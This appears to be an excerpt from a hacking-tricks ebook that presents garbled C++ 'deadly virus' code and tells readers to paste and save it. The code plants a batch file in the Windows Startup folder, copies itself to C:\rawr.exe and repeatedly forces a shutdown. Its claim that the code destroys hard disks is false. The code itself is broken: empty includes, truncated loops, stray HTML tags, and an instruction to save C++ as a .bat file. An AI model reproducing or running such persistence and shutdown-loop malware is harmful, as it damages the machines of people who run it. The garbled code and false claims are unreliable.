```
the coding of a very deadly virus.. of course made by me..
/////*1000+ HACKING TRICKS & TUTORIALS - ebook By Mukesh Bhardwaj Blogger - Paid Version - only @
TekGyd | itechhacks | Mukeshtricks4u*//////
NOTE: WE WILL NOT BE RESPONSIBLE FOR ANY KIND OF HARM TO YOUR COMPUTER OR OTHER COMPUTERS IN AI
1. open notepad..
2. copy and paste this code...
// The Deadly Virus
// Created by vaibhav
#include
#include
#include
#include
#include
#include
#include
using namespace std;
int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
{
char buffer[255];
char inputFile[]="C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat";
ifstream input(inputFile);
if (!input)
ofstream fp("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";</pre>
fp << "EXIT";
}
}
else
while (!input.eof())
input.getline(buffer,255);
}
```

```
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";</pre>
fp << "START C:\\rawr.exe \n";</pre>
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
while (!input.eof())
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}
START:{
for(int i = 0; i <>
int num = (rand() \% 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout <<>
Sleep(60);
}
for ( int j = 0; j \ll
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
```

} goto START; }
3. now save the file as 'matrix.bat' (without quotes).
so your deadly virus is ready now
it can destroy the hard disk as well as various other components of the computer and the only option left over will be the replacement of the computer!!!
so be careful frnds

cout <<>